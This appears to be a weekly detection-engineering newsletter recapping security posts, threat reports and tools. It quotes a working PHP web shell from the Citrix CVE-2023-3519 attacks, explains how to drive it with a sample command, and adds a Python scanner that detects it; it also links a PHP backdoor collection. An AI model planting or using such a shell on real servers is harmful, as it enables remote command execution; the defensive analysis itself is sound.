Detection Engineering Weekly #36 - I survived DEFCON
Though I did get interrogated by someone with a Tor badge
Welcome to Issue #36 of Detection Engineering Weekly!
I had an amazing time at hacker summer camp. Thank you to everyone who I connected with! I ran out of stickers in two days, saw several talks, played in a CTF, got product demos and swapped war stories at w00con. Lastly, I copped a Tor badge which had a small lie detector/polygraph hardware attached to it, and managed to “interrogate” a few people :D.
This week’s recap:
💎 by Tom Wolters on a Purple Team engagement where everyone wins
Lots of GitHub Hacking with two stories by mthcht and Daniel Grzelak
Anti-forensics script hunting with Phillip Kittelson, back to basics with Goblin Loot and thinking with tabular data with Amitai Cohen
Qakbot updates by Team Cymru, Europol takes down a bulletproof hoster, Stairwell finds some shenanigans during the Citrix CVE exploitation window
Plus soo much more!
🫵 Hey you! Do you have a blog post, social link, or open-source tool you want to see in this newsletter?
Leave a comment below or email me techy@detectionengineering.net
💎 Detection Engineering Gem 💎
The Year Of The White Rabbit by Tom Wolters
This week's gem follows Wolters during a purple team engagement where they find a zero-day. A network switch exposed a PHP-based web application to manage the network device's configuration via the web. Wolters shares the methodology used during the engagement, which included recon on the web application, which turned out to be an open-source project.
They successfully exploited the application after some finagling of payloads, and the cool part here is that although the switch was pwned, the blue team caught post-exploitation activity! Turns out, writing detections across the "kill chain" helps bolster a defense-in-depth strategy. Who would've thought?!
State of the Art
How Threat Actors Use GitHub by mthcht
Like most cloud-hosting or SaaS apps (I'm looking at you, Discord), threat actors can abuse GitHub to do all kinds of funky things. In this post, mthcht highlights three scenarios that turn GitHub from a collaboration platform into attacker infrastructure. Luckily, mthcht provides Detection Opportunities for all scenarios!
Purple teaming — Understand Pivoting by Tho Le
This week has a ton of red team content! Maybe I'm feeling like switching to the dark side after DEFCON. In this post, Le assumes the reader is new to pivoting in red-team engagements and takes them on a deep dive through all kinds of pivoting scenarios. They have a good lab setup and meticulously go through each step of each pivot scenario to showcase the power of pivoting. This shows how important practicing red-team techniques is for a detection engineer.
Hacking Github AWS integrations again by Daniel Grzelak
I've linked a few GitHub-AWS OIDC security posts in this newsletter, even from my own company, but this one has the best analogies and metaphors! Oh, also, a lot of fantastic technical content. If you are GitHub-OIDC-to-AWS curious, follow along as Grzelak walks through setting up a vulnerable implementation for testing, especially a vulnerable "racy randy role." I also learned that GitHub has a public events API that anyone can subscribe to!
Snarkiness aside, I appreciate this quote toward the end of the post:
Please talk to your friends at Github and AWS. Similar to s3 buckets which were systemically mis-permissioned (sic) because of a variety of user inteface (sic) design flaws, this confused deputy issue is rampant and needs to be prevented systemically by default or somebody gonna get hurt real bad.
Brilliance in the Basics by Goblin Loot
No matter where you are in your security career, you must remember the basics. Security reminds me a lot of jiu-jitsu. With hundreds of hours of mat time at this point, I find myself more interested in the basics of the sport than in the advanced or sexy concepts. Goblin Loot does some security jiu-jitsu on you in this post, reminding us to keep it simple. My favorite recommendation: "If it's not for a human don't give it to a human."
Anti-forensics YARA rules by Phillip Kittelson
The author's first YARA rule is a banger! Kittelson found a post from SANS Internet Storm Center that reports on a malicious Python file that tries to perform anti-forensics operations before running. On Windows, threat actors can use several techniques to hide from dynamic and static analysis engines, and this cheeky sample looked for the window names of common forensics tools and terminated them. Kittelson then created a high-fidelity rule to hunt for samples that use this technique, with much better results.
Tabular Thinking by Amitai Cohen
Are you familiar with high-school-level chemistry and vegetables? Cohen has a blog post that uses these two things to describe tabular thinking and how beneficial it is, not just for security research but for almost any research. Cohen offers five "tabular mindset" axioms that I will steal (with credit). The short version: think of tables as a structured representation of a data model that you can add to, remove from, grow, and reshape as you get more familiar with a problem space. And don't make fun of threat intel people who do everything in Excel. They are probably the most knowledgeable people about a subject that you know!
Detection Engineering on Social Media
Link: https://twitter.com/0x4d31/status/1691206826686029824
Link: https://twitter.com/HackingLZ/status/1690042780649762817
Link: https://twitter.com/jaimeblascob/status/1689694476770623491
Threat Landscape
Visualizing Qakbot Infrastructure: Uncharted Territory (part 2 of 2) by Team Cymru
Qakbot continues its campaign against literally everyone, and Team Cymru has an excellent analysis on updates to the malware family's C2 network. Some interesting new findings include: Qakbot operators love residential IPs for T2 connections, destination ports are not as random anymore, and the operators may take the summer off (maybe on the frontlines?).
5 arrested in Poland for running bulletproof hosting service for cybercrime gangs by Europol
I've always found bulletproof hosting services fascinating, especially when you are in a NATO country or a country with extradition. Like, what's the calculus behind some of these organizers who start one? Anyways, it's good to see Europol/US Departments working together to take down these hosters. It's not just cybercrime that bulletproof hosters engage in, but some other heinous things that make them (in my opinion) horrible, dangerous people.
CVE-2023-3519: Stairwell identifies previously unseen attack methods by Stairwell Threat Research
Stairwell identified post-compromise tooling used by threat actors exploiting Citrix’s CVE-2023-3519. Two interesting things here. First, these web shells were not documented in the original CISA advisory about the vulnerability. Secondly, these shells are brilliantly simple, particularly the first one listed.
<?php http_response_code(404);
@$_POST['variable1']($_POST['variable2']);
?>
I’ve seen a few hax0r PHP shells in my day, but I tip my hat to this one. Basically, the first POST request variable, variable1, is loaded and used as a function name (think passing system or shell_exec in here; eval would not work, because in PHP it is a language construct rather than a callable function). The next variable, variable2, is the argument to that call, so a body of variable1=system&variable2=id runs id on the appliance. The @ in front is PHP's error control operator, so if the expression generates an error, it’s suppressed. The http_response_code(404) at the top means every response, including a successful command, comes back looking like a missing page to anyone scanning for it. Neat!
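Because the shell never mentions system, exec or eval by name, string-matching on dangerous function names misses it. What gives it away is a request superglobal being used as the function in a variable function call. The scanner below, an added example that is not part of the Stairwell write-up or of this newsletter, hunts for exactly that pattern (directly or via an intermediate variable) and flags the fake-404 trick as a secondary indicator. The three PHP files it scans are constructed for the example; only the first mirrors the shell shown above.

```python
import re

# Constructed sample PHP files for the example. 404.php reproduces the
# shell quoted above; index.php is a benign page that also reads request
# data; cmd.php hides the same trick behind an intermediate variable.
SAMPLES = {
    "404.php": "<?php http_response_code(404);\n"
               "@$_POST['variable1']($_POST['variable2']);\n?>",
    "index.php": "<?php\n$name = htmlspecialchars($_GET['name'] ?? 'world');\n"
                 "echo \"Hello, $name\";\n?>",
    "cmd.php": "<?php\n$f = $_REQUEST['f'];\n$f($_REQUEST['a']);\n?>",
}

# A request superglobal element such as $_POST['x'] or $_REQUEST["x"].
SUPERGLOBAL = r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[\s*['\"]?\w+['\"]?\s*\]"

# Pattern 1: the superglobal itself is called as a function, e.g.
# @$_POST['a']($_POST['b']). The optional @ is PHP's error suppression.
DIRECT_VARFUNC = re.compile(r"@?\s*" + SUPERGLOBAL + r"\s*\(")

# Pattern 2: the superglobal is first copied into a local, $f = $_REQUEST['f'],
# and the local is then called as $f(...).
ASSIGN_FROM_REQUEST = re.compile(r"(\$\w+)\s*=\s*" + SUPERGLOBAL)

# Secondary indicator: forcing a 404 so the shell looks like a missing page.
FAKE_404 = re.compile(r"http_response_code\s*\(\s*404\s*\)")


def scan_php(src):
    """Return a list of findings for one PHP source string (empty if clean)."""
    findings = []
    if DIRECT_VARFUNC.search(src):
        findings.append("request-controlled variable function call")
    for m in ASSIGN_FROM_REQUEST.finditer(src):
        var = m.group(1)
        # The local must itself be invoked; $f alone is not enough.
        if re.search(re.escape(var) + r"(?!\w)\s*\(", src):
            findings.append(
                "indirect request-controlled variable function call via " + var)
    # Only report the 404 trick alongside a real execution primitive;
    # on its own it is common in legitimate code.
    if findings and FAKE_404.search(src):
        findings.append("fake 404 status before execution")
    return findings


def scan_all(samples=SAMPLES):
    """Map each file name to its findings, keeping only files with hits."""
    return {name: hits for name, src in samples.items()
            if (hits := scan_php(src))}


if __name__ == "__main__":
    for name, hits in scan_all().items():
        print(name)
        for hit in hits:
            print("  -", hit)
```

Run it against a directory of PHP files by replacing SAMPLES with the files' contents. The regexes are deliberately loose (they ignore comments and string contexts), so treat a hit as a triage candidate rather than a verdict; the point is that the detection keys on the data-flow shape, not on a list of function names that the next shell variant will simply avoid.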
When a Zero Day and Access Keys Collide in the Cloud: Responding to the SugarCRM Zero-Day Vulnerability by Margaret Zimmerman
In this post, Zimmerman makes the case that you should do threat detection on your whole stack, not just the application. During this case walk-through, an attacker exploits CVE-2023-22952 to access cloud infrastructure and then uses that access to pivot to AWS via plain-text credentials left on the box. The best part? Detection Opportunities at the end!
Mac systems turned into proxy exit nodes by AdLoad by Fernando Martinez
Speaking of Qakbot's shenanigans with residential IPs, why not piggyback and buy access from devices that never get malware? That's right, macOS, malware-free! PSYCHE (does saying this age me?). I'd be interested to see data on whether more serious malware uses proxyware and PitM-infected devices for something more nefarious. AT&T did an excellent job of profiling AdLoad here and has seen 10,000 unique IPs a week reaching out as potential proxy exit nodes.
Discord.io confirms breach after hacker steals data of 760K users by Lawrence Abrams
The great thing about SaaS-based authentication? Integration with 3rd party providers! The bad thing about SaaS-based authentication? Integration with 3rd party providers! Especially if those 3rd party providers can't provide reasonable protection to their user bases, resulting in a breach of a service that definitely won't be used for doxxing or anything malicious. Turns out, Discord.io is one of these services, and an actor on an underground forum is selling the database to the highest bidder.
Open Source
shell-backdoor by beruangsalju
Pretty massive collection of PHP backdoors/shell backdoors. Maybe Stairwell can add their Citrix finding (it won’t look as nice as some of these, but it probably won’t get caught as much as “1337 Hax0R SHELL by HACK3RMAN (shoutz HACKERCR3W)”).
SWAT by elastic
The Elastic team released SWAT (Simple Workspace ATT&CK Tool) at DEFCON and I can’t wait to try it out! It’s a cloud threat emulation tool designed for Google Workspace. Definitely helpful for readers here that work in Google environments.
TTPForge by Facebook Incubator
Lots of threat emulation tools coming out of DEFCON, this time from Facebook/Meta. TTPForge is the CLI that runs the TTPs published in the companion ForgeArmory repository and lets detection engineers simulate attacks on AWS and Linux. Not as much coverage as other tools, but good to see competition for Atomic Red Team.
DFIQ by Google
DFIQ contains a list of DFIR scenarios, each of which breaks down into several questions to ask when performing an investigation. I like the grouping of scenarios, questions and tags, and some questions come with concrete approaches. It’s a neat codification of DFIR with a high-level model for creating repeatable investigation playbooks.
RedWizard by SecuraBV
Automated red-team infrastructure builder with all kinds of OPSEC-safe techniques for different types of boxes. This tool may upset the camp of people who don’t want people to publish red team tools, but I love this stuff because it gives insight into how to build detections for techniques that threat actors likely used in the wild.